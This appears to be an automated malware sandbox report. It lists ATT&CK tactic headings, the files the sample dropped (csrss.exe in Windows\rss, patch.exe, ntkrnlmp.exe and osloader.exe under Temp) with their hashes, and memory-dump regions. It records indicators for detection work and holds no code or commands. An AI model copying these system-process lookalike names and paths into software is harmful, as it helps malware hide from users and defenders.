    Command and Control
      Credential Access
        Discovery
        Execution
          Exfiltration
            Impact
              Initial Access
                Lateral Movement
                  Privilege Escalation
                    Replay Monitor
                    00:00 00:00
                    Downloads
                    • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

                      MD5

                      13aaafe14eb60d6a718230e82c671d57

                      SHA1

                      e039dd924d12f264521b8e689426fb7ca95a0a7b

                      SHA256

                      f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

                      SHA512

                      ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

                    • C:\Windows\rss\csrss.exe

                      MD5

                      7da8b9fc5c5a67a06afc0749473f1b6e

                      SHA1

                      7b0c1138015a3a573469e1142e44be65b73979c5

                      SHA256

                      bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7

                      SHA512

                      5b9a364aa7cdf6340e709afb5a60eabd045ace1eaeefaa23fd89ede50bd0a51329d69a4afd49ca270ebb80014882ef7728cf72a362a1d0a63d01ba66fa244df7

                    • \Users\Admin\AppData\Local\Temp\csrss\patch.exe

                      MD5

                      13aaafe14eb60d6a718230e82c671d57

                      SHA1

                      e039dd924d12f264521b8e689426fb7ca95a0a7b

                      SHA256

                      f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

                      SHA512

                      ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

                    • \Users\Admin\AppData\Local\Temp\csrss\patch.exe

                      MD5

                      13aaafe14eb60d6a718230e82c671d57

                      SHA1

                      e039dd924d12f264521b8e689426fb7ca95a0a7b

                      SHA256

                      f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

                      SHA512

                      ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

                    • \Users\Admin\AppData\Local\Temp\csrss\patch.exe

                      MD5

                      13aaafe14eb60d6a718230e82c671d57

                      SHA1

                      e039dd924d12f264521b8e689426fb7ca95a0a7b

                      SHA256

                      f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

                      SHA512

                      ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

                    • \Users\Admin\AppData\Local\Temp\dbghelp.dll

                      MD5

                      f0616fa8bc54ece07e3107057f74e4db

                      SHA1

                      b33995c4f9a004b7d806c4bb36040ee844781fca

                      SHA256

                      6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

                      SHA512

                      15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

                    • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

                      MD5

                      1afff8d5352aecef2ecd47ffa02d7f7d

                      SHA1

                      8b115b84efdb3a1b87f750d35822b2609e665bef

                      SHA256

                      c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

                      SHA512

                      e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

                    • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

                      MD5

                      1afff8d5352aecef2ecd47ffa02d7f7d

                      SHA1

                      8b115b84efdb3a1b87f750d35822b2609e665bef

                      SHA256

                      c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

                      SHA512

                      e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

                    • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

                      MD5

                      1afff8d5352aecef2ecd47ffa02d7f7d

                      SHA1

                      8b115b84efdb3a1b87f750d35822b2609e665bef

                      SHA256

                      c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

                      SHA512

                      e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

                    • \Users\Admin\AppData\Local\Temp\osloader.exe

                      MD5

                      e2f68dc7fbd6e0bf031ca3809a739346

                      SHA1

                      9c35494898e65c8a62887f28e04c0359ab6f63f5

                      SHA256

                      b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

                      SHA512

                      26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

                    • \Users\Admin\AppData\Local\Temp\osloader.exe

                      MD5

                      e2f68dc7fbd6e0bf031ca3809a739346

                      SHA1

                      9c35494898e65c8a62887f28e04c0359ab6f63f5

                      SHA256

                      b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

                      SHA512

                      26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

                    • \Users\Admin\AppData\Local\Temp\osloader.exe

                      MD5

                      e2f68dc7fbd6e0bf031ca3809a739346

                      SHA1

                      9c35494898e65c8a62887f28e04c0359ab6f63f5

                      SHA256

                      b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

                      SHA512

                      26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

                    • \Users\Admin\AppData\Local\Temp\symsrv.dll

                      MD5

                      5c399d34d8dc01741269ff1f1aca7554

                      SHA1

                      e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

                      SHA256

                      e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

                      SHA512

                      8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

                    • \Windows\rss\csrss.exe

                      MD5

                      7da8b9fc5c5a67a06afc0749473f1b6e

                      SHA1

                      7b0c1138015a3a573469e1142e44be65b73979c5

                      SHA256

                      bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7

                      SHA512

                      5b9a364aa7cdf6340e709afb5a60eabd045ace1eaeefaa23fd89ede50bd0a51329d69a4afd49ca270ebb80014882ef7728cf72a362a1d0a63d01ba66fa244df7

                    • \Windows\rss\csrss.exe

                      MD5

                      7da8b9fc5c5a67a06afc0749473f1b6e

                      SHA1

                      7b0c1138015a3a573469e1142e44be65b73979c5

                      SHA256

                      bf0584009df2836bedf0ba3b0d499b1a8b2208bf59c85e6b12db123e9ccdafd7

                      SHA512

                      5b9a364aa7cdf6340e709afb5a60eabd045ace1eaeefaa23fd89ede50bd0a51329d69a4afd49ca270ebb80014882ef7728cf72a362a1d0a63d01ba66fa244df7

                    • memory/868-68-0x0000000005130000-0x00000000054D7000-memory.dmp

                    • memory/868-69-0x0000000005130000-0x00000000054D7000-memory.dmp

                    • memory/868-70-0x0000000000400000-0x00000000036C8000-memory.dmp

                    • memory/868-66-0x0000000000000000-mapping.dmp

                    • memory/1292-84-0x0000000000000000-mapping.dmp

                    • memory/1388-63-0x0000000000400000-0x00000000036C8000-memory.dmp

                    • memory/1388-59-0x0000000004FB0000-0x0000000005357000-memory.dmp

                    • memory/1388-58-0x0000000004FB0000-0x0000000005357000-memory.dmp

                    • memory/1448-56-0x00000000053B0000-0x0000000005AA6000-memory.dmp

                    • memory/1448-55-0x0000000005000000-0x00000000053A7000-memory.dmp

                    • memory/1448-54-0x0000000005000000-0x00000000053A7000-memory.dmp

                    • memory/1448-57-0x0000000000400000-0x00000000036C8000-memory.dmp

                    • memory/1652-60-0x0000000000000000-mapping.dmp

                    • memory/1856-62-0x000007FEFBF51000-0x000007FEFBF53000-memory.dmp

                    • memory/1856-61-0x0000000000000000-mapping.dmp